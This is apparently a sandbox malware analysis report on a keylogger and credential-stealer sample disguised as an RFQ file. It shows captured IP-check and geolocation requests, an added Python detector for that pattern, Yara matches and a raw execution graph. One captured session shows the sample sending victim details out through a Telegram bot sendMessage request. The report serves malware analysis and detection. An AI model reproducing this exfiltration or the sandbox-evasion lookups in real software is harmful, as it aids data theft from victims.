2024-12-11 07:59:16 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
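
The sessions above are the behaviour behind the "Tries to detect the country of the analysis system (by using the IP)" signature: the hollowed RegSvcs.exe (PID 7508) asks checkip.dyndns.org for the sandbox's public address with a fixed User-Agent, and looks that same address up at reallyfreegeoip.org/xml/8.46.123.175 with no User-Agent at all, retrying every few seconds. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the two response bodies exactly as captured (including the XML the report cuts off at "</TimeZo") and flags the IP-check plus geolocation pair in a batch of HTTP records. The records are constructed from the sessions above plus one benign Firefox control, and the host and process watchlists are assumptions limited to what this report shows; extend them from your own telemetry.

```python
# Added example, not part of the Joe Sandbox report or of the sample: parse the two
# response bodies captured above and flag the IP-check + geolocation pair in HTTP records.
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from pathlib import PureWindowsPath

# Exact strings from the sessions above.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
CHECKIP_BODY = ("<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 8.46.123.175</body></html>\r\n")
# The report's capture of the XML stops at "</TimeZo"; kept truncated on purpose.
GEOIP_BODY_TRUNCATED = ("<Response>\n\t<IP>8.46.123.175</IP>\n\t<CountryCode>US</CountryCode>\n\t"
                        "<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n\t"
                        "<RegionName>New York</RegionName>\n\t<City>New York</City>\n\t"
                        "<ZipCode>10118</ZipCode>\n\t<TimeZone>America/New_York</TimeZo")

# Assumed watchlists: only the hosts seen in this report; extend from your own telemetry.
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# Assumed list of .NET Framework utilities with no reason to speak HTTP; RegSvcs.exe is the one here.
DOTNET_UTILITY_PROCESSES = {"regsvcs.exe", "regasm.exe", "installutil.exe"}
IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"


def parse_checkip(body):
    """Public IP from a checkip.dyndns.org body, or None."""
    m = re.search(r"Current IP Address:\s*(" + IPV4 + ")", body)
    return m.group(1) if m else None


def parse_geoip_xml(body):
    """Fields from the reallyfreegeoip.org XML. Regexes, not an XML parser: the capture
    is cut mid-tag and a strict parser would reject it; a cut-off tag is simply omitted."""
    fields = {}
    for tag in ("IP", "CountryCode", "CountryName", "RegionCode", "RegionName", "City", "ZipCode", "TimeZone"):
        m = re.search(rf"<{tag}>([^<]*)</{tag}>", body)
        if m:
            fields[tag] = m.group(1)
    return fields


@dataclass
class HttpRecord:
    ts: datetime
    pid: int
    process: str
    host: str
    path: str
    user_agent: str = ""  # empty = header absent, as in the geoip requests above


def find_ip_geolocation_recon(records, window=timedelta(seconds=60)):
    """One finding per PID that contacts an IP-check host and a geolocation host within `window`."""
    by_pid = defaultdict(list)
    for r in records:
        by_pid[r.pid].append(r)
    findings = []
    for pid, recs in by_pid.items():
        checks = [r for r in recs if r.host.lower() in IP_CHECK_HOSTS]
        geos = [r for r in recs if r.host.lower() in GEOIP_HOSTS]
        paired = [g for g in geos if any(abs(g.ts - c.ts) <= window for c in checks)]
        if not checks or not paired:
            continue
        hits = sorted(checks + paired, key=lambda r: r.ts)
        indicators = {"ip_check_plus_geolocation"}
        if any(re.search(IPV4, g.path) for g in paired):
            indicators.add("geoip_path_carries_ipv4")  # the looked-up address rides in the URL
        if any(r.user_agent == LEGACY_UA for r in hits):
            indicators.add("legacy_dotnet_user_agent")
        if any(not r.user_agent for r in hits):
            indicators.add("missing_user_agent")
        if PureWindowsPath(hits[0].process).name.lower() in DOTNET_UTILITY_PROCESSES:
            indicators.add("dotnet_utility_process")
        if len(hits) >= 4:
            indicators.add("repeated_lookups")  # the sample retries every few seconds
        findings.append({"pid": pid, "process": hits[0].process, "first": hits[0].ts,
                         "last": hits[-1].ts, "lookups": len(hits), "indicators": sorted(indicators)})
    return findings


# Constructed from the sessions above (UTC), plus one benign control that must not fire.
T0 = datetime(2024, 12, 11, 7, 59, 5, tzinfo=timezone.utc)
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"  # constructed
SAMPLE_RECORDS = [
    HttpRecord(T0, 7508, REGSVCS, "reallyfreegeoip.org", "/xml/8.46.123.175"),
    HttpRecord(T0 + timedelta(seconds=2), 7508, REGSVCS, "reallyfreegeoip.org", "/xml/8.46.123.175"),
    HttpRecord(T0 + timedelta(seconds=5), 7508, REGSVCS, "reallyfreegeoip.org", "/xml/8.46.123.175"),
    HttpRecord(T0 + timedelta(seconds=15), 7508, REGSVCS, "checkip.dyndns.org", "/", LEGACY_UA),
    HttpRecord(T0 + timedelta(seconds=18), 7508, REGSVCS, "checkip.dyndns.org", "/", LEGACY_UA),
    HttpRecord(T0 + timedelta(seconds=21), 7508, REGSVCS, "checkip.dyndns.org", "/", LEGACY_UA),
    HttpRecord(T0 + timedelta(minutes=5), 4120, r"C:\Program Files\Mozilla Firefox\firefox.exe",
               "checkip.dyndns.org", "/", FIREFOX_UA),
]

if __name__ == "__main__":
    print(parse_checkip(CHECKIP_BODY), parse_geoip_xml(GEOIP_BODY_TRUNCATED))
    print(*find_ip_geolocation_recon(SAMPLE_RECORDS), sep="\n")
```

The pair fires only when the same PID hits both an IP-check host and a geolocation host inside the window, so a browser or update agent that checks its address once (the Firefox control) stays silent; the remaining indicators (fixed legacy User-Agent, absent User-Agent, a .NET utility as the client, repeated lookups) are what separate this sample's traffic from an ordinary one-off check and are worth scoring rather than alerting on individually. Feed real proxy or Zeek http.log rows into HttpRecord and the same function applies.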


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 7508 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2024-12-11 07:59:19 UTC | Bytes transferred: 61 | Direction: OUT | Data:
GET /xml/8.46.123.175 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-12-11 07:59:20 UTC | Bytes transferred: 881 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:19 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 83282
Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3p%2BbFhRVYroQjO6kOfh1lJWROSD1NU2E2CAQgXA7bX6FpW3rBZeYo%2BkL2GkF4hYTjhK%2Fs8Nen7xszNZVRnjkFPjbYSCy13%2B6jRe%2FdeAAFop0QHv2aeE7l5o5taGTi94Iclvu%2BAon"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f03ef4548768ca2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2015&rtt_var=773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399808&cwnd=252&unsent_bytes=0&cid=d6962b72bd26235b&ts=458&x=0"
Timestamp: 2024-12-11 07:59:20 UTC | Bytes transferred: 362 | Direction: IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 7508 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2024-12-11 07:59:22 UTC | Bytes transferred: 61 | Direction: OUT | Data:
GET /xml/8.46.123.175 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-12-11 07:59:23 UTC | Bytes transferred: 876 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:23 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 83286
Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUuCrtMvKB9MiR8yLhtycWZnQuH%2FX2qV7lxm8EZSgUQKjxAVpg4meozc5HJ0%2FEiV70SqQy030VsONiKCX2aIJzmycY7XXEbQgFlSmbXe0h1ZqAMtBPSahH%2F5ScJp9iU44jnIzL7%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f03ef593a5243a1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4240&recv_bytes=699&delivery_rate=209049&cwnd=233&unsent_bytes=0&cid=dc239eb213867964&ts=461&x=0"
Timestamp: 2024-12-11 07:59:23 UTC | Bytes transferred: 362 | Direction: IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 7508 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2024-12-11 07:59:25 UTC | Bytes transferred: 61 | Direction: OUT | Data:
GET /xml/8.46.123.175 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-12-11 07:59:26 UTC | Bytes transferred: 875 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:26 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 83289
Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6LNni%2BFjqW3fZhoPhN495e%2BwL9syvmTDrgtJ2h751xmZmdBNfAPywpi4lYDzjYDseULNf6Vo6cku7KFYfZWgohkyuy0ci1x3KZqy1%2F4c12mWCNEqD0CJsNVVdy7PRzGxGc10mIX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f03ef6cb9080f8d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1498&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1935056&cwnd=177&unsent_bytes=0&cid=221c5f4c424d147b&ts=450&x=0"
Timestamp: 2024-12-11 07:59:26 UTC | Bytes transferred: 362 | Direction: IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 7508 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2024-12-11 07:59:29 UTC | Bytes transferred: 85 | Direction: OUT | Data:
GET /xml/8.46.123.175 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-12-11 07:59:29 UTC | Bytes transferred: 873 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:29 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 83292
Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tb%2F6rAhJEtY4aVoSTYO627HRIMa5t95cCDRSqAbBUINyQ13UZve7VlTgFZTZzPWbNP64lhwvUL0exw0edhJ9SE%2FRZcPXU3DfFcgNBB41R5upTxXKr5pjxJfKbnshbnPVzRSF3Ot"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f03ef8039f943e2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1810&rtt_var=702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1534419&cwnd=212&unsent_bytes=0&cid=0e3ae1f05cdc0093&ts=449&x=0"
Timestamp: 2024-12-11 07:59:29 UTC | Bytes transferred: 362 | Direction: IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7508 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2024-12-11 07:59:31 UTC | Bytes transferred: 349 | Direction: OUT | Data:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-12-11 07:59:31 UTC | Bytes transferred: 344 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 11 Dec 2024 07:59:31 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-12-11 07:59:31 UTC | Bytes transferred: 55 | Direction: IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 02:58:57
Start date: 11/12/2024
Path: C:\Users\user\Desktop\DEC 2024 RFQ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
Imagebase: 0x20000
File size: 1'010'688 bytes
MD5 hash: 34B4D7918DC670F64013E5D1F58A85CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:58:58
Start date: 11/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
Imagebase: 0x840000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 3.9%
Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 5.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 167
                                                                                                                      execution_graph 100447 23633 100448 2366a 100447->100448 100449 236e7 100448->100449 100450 23688 100448->100450 100451 236e5 100448->100451 100455 5d0cc 100449->100455 100456 236ed 100449->100456 100452 23695 100450->100452 100453 2374b PostQuitMessage 100450->100453 100454 236ca DefWindowProcW 100451->100454 100458 5d154 100452->100458 100459 236a0 100452->100459 100460 236d8 100453->100460 100454->100460 100496 31070 10 API calls Mailbox 100455->100496 100461 236f2 100456->100461 100462 23715 SetTimer RegisterWindowMessageW 100456->100462 100512 82527 71 API calls _memset 100458->100512 100464 23755 100459->100464 100465 236a8 100459->100465 100468 5d06f 100461->100468 100469 236f9 KillTimer 100461->100469 100462->100460 100466 2373e CreatePopupMenu 100462->100466 100463 5d0f3 100497 31093 341 API calls Mailbox 100463->100497 100494 244a0 64 API calls _memset 100464->100494 100471 236b3 100465->100471 100472 5d139 100465->100472 100466->100460 100475 5d074 100468->100475 100476 5d0a8 MoveWindow 100468->100476 100492 2443a Shell_NotifyIconW _memset 100469->100492 100478 236be 100471->100478 100479 5d124 100471->100479 100472->100454 100511 77c36 59 API calls Mailbox 100472->100511 100473 5d166 100473->100454 100473->100460 100481 5d097 SetFocus 100475->100481 100482 5d078 100475->100482 100476->100460 100478->100454 100498 2443a Shell_NotifyIconW _memset 100478->100498 100510 82d36 81 API calls _memset 100479->100510 100480 23764 100480->100460 100481->100460 100482->100478 100486 5d081 100482->100486 100483 2370c 100493 23114 DeleteObject DestroyWindow Mailbox 100483->100493 100495 31070 10 API calls Mailbox 100486->100495 100490 5d118 100499 2434a 100490->100499 100492->100483 100493->100460 100494->100480 100495->100460 100496->100463 100497->100478 100498->100490 100500 24375 _memset 100499->100500 100513 24182 100500->100513 100503 243fa 
100505 24430 Shell_NotifyIconW 100503->100505 100506 24414 Shell_NotifyIconW 100503->100506 100507 24422 100505->100507 100506->100507 100517 2407c 100507->100517 100509 24429 100509->100451 100510->100480 100511->100451 100512->100473 100514 24196 100513->100514 100515 5d423 100513->100515 100514->100503 100539 82f94 62 API calls _W_store_winword 100514->100539 100515->100514 100516 5d42c DestroyIcon 100515->100516 100516->100514 100518 24098 100517->100518 100538 2416f Mailbox 100517->100538 100540 27a16 100518->100540 100521 240b3 100545 27bcc 100521->100545 100522 5d3c8 LoadStringW 100525 5d3e2 100522->100525 100524 240c8 100524->100525 100526 240d9 100524->100526 100527 27b2e 59 API calls 100525->100527 100528 240e3 100526->100528 100529 24174 100526->100529 100532 5d3ec 100527->100532 100554 27b2e 100528->100554 100563 28047 100529->100563 100535 240ed _memset _wcscpy 100532->100535 100567 27cab 100532->100567 100534 5d40e 100537 27cab 59 API calls 100534->100537 100536 24155 Shell_NotifyIconW 100535->100536 100536->100538 100537->100535 100538->100509 100539->100503 100574 40db6 100540->100574 100542 27a3b 100584 28029 100542->100584 100546 27c45 100545->100546 100547 27bd8 __NMSG_WRITE 100545->100547 100616 27d2c 100546->100616 100549 27c13 100547->100549 100550 27bee 100547->100550 100551 28029 59 API calls 100549->100551 100615 27f27 59 API calls Mailbox 100550->100615 100553 27bf6 _memmove 100551->100553 100553->100524 100555 27b40 100554->100555 100556 5ec6b 100554->100556 100624 27a51 100555->100624 100630 77bdb 59 API calls _memmove 100556->100630 100559 27b4c 100559->100535 100560 5ec75 100561 28047 59 API calls 100560->100561 100562 5ec7d Mailbox 100561->100562 100564 28052 100563->100564 100565 2805a 100563->100565 100631 27f77 59 API calls 2 library calls 100564->100631 100565->100535 100568 27cbf 100567->100568 100569 5ed4a 100567->100569 100632 27c50 100568->100632 100571 28029 59 API calls 100569->100571 100573 5ed55 __NMSG_WRITE _memmove 
100571->100573 100572 27cca 100572->100534 100576 40dbe 100574->100576 100577 40dd8 100576->100577 100579 40ddc std::exception::exception 100576->100579 100587 4571c 100576->100587 100604 433a1 DecodePointer 100576->100604 100577->100542 100605 4859b RaiseException 100579->100605 100581 40e06 100606 484d1 58 API calls _free 100581->100606 100583 40e18 100583->100542 100585 40db6 Mailbox 59 API calls 100584->100585 100586 240a6 100585->100586 100586->100521 100586->100522 100588 45797 100587->100588 100591 45728 100587->100591 100613 433a1 DecodePointer 100588->100613 100590 4579d 100614 48b28 58 API calls __getptd_noexit 100590->100614 100594 4575b RtlAllocateHeap 100591->100594 100597 45733 100591->100597 100598 45783 100591->100598 100602 45781 100591->100602 100610 433a1 DecodePointer 100591->100610 100594->100591 100595 4578f 100594->100595 100595->100576 100597->100591 100607 4a16b 58 API calls __NMSG_WRITE 100597->100607 100608 4a1c8 58 API calls 5 library calls 100597->100608 100609 4309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100597->100609 100611 48b28 58 API calls __getptd_noexit 100598->100611 100612 48b28 58 API calls __getptd_noexit 